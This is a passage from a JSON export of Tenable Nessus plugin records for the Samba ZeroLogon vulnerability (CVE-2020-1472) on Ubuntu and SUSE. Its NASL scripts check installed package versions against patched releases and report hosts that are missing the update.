script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:registry-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:smbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:winbind\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2023 Canonical, Inc. / NASL script (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'ctdb', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'python-samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-common', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'smbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '18.04', 'pkgname': 'ctdb', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'python-samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-common', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'smbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ctdb / libnss-winbind / libpam-winbind / libparse-pidl-perl / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:50", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-4559-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-02T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS : Samba update (USN-4559-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:ctdb", "p-cpe:/a:canonical:ubuntu_linux:libnss-winbind", "p-cpe:/a:canonical:ubuntu_linux:libpam-winbind", "p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient0", "p-cpe:/a:canonical:ubuntu_linux:python-samba", "p-cpe:/a:canonical:ubuntu_linux:python3-samba", "p-cpe:/a:canonical:ubuntu_linux:registry-tools", "p-cpe:/a:canonical:ubuntu_linux:samba", "p-cpe:/a:canonical:ubuntu_linux:samba-common", "p-cpe:/a:canonical:ubuntu_linux:samba-common-bin", "p-cpe:/a:canonical:ubuntu_linux:samba-dev", "p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules", "p-cpe:/a:canonical:ubuntu_linux:samba-libs", "p-cpe:/a:canonical:ubuntu_linux:samba-testsuite", "p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules", "p-cpe:/a:canonical:ubuntu_linux:smbclient", "p-cpe:/a:canonical:ubuntu_linux:winbind"], "id": "UBUNTU_USN-4559-1.NASL", "href": "https://www.tenable.com/plugins/nessus/141112", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4559-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141112);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"USN\", value:\"4559-1\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS : Samba update (USN-4559-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS host has packages installed that are affected by a vulnerability as\nreferenced in the USN-4559-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4559-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libnss-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3-samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:registry-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:smbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:winbind\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2023 Canonical, Inc. / NASL script (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|20\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04 / 20.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'ctdb', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'python-samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-common', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'smbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '18.04', 'pkgname': 'ctdb', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'python-samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-common', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'smbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '20.04', 'pkgname': 'ctdb', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'python3-samba', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-common', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'smbclient', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'winbind', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ctdb / libnss-winbind / libpam-winbind / libparse-pidl-perl / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:12", "description": "This update for samba fixes the following issues :\n\nUpdate to 4.10.18\n\nZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2720-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", 